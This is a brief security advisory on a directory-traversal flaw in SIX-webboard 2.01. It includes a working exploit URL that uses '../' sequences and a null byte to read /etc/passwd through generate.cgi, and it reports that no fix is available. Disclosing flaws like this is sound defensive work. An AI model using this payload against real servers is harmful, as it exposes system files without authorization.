COMMAND

    SIX-webboard

SYSTEMS AFFECTED

    SIX-webboard 2.01

PROBLEM

    'digitalseed'  found  following.   '..'  and  '/' are not filtered
    while processing user input, so it is possible to enter  arbitrary
    values to retreive  files from remote  sever, which should  not be
    accessible normally.  Exploit:

        http://www.target.net/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/passwd%00&board=boardsname

    The  above  line  if  given  will  output  the  file  contents  of
    /etc/passwd.  Discovery by digitalseed and k$en0r.

SOLUTION

    Nothing yet.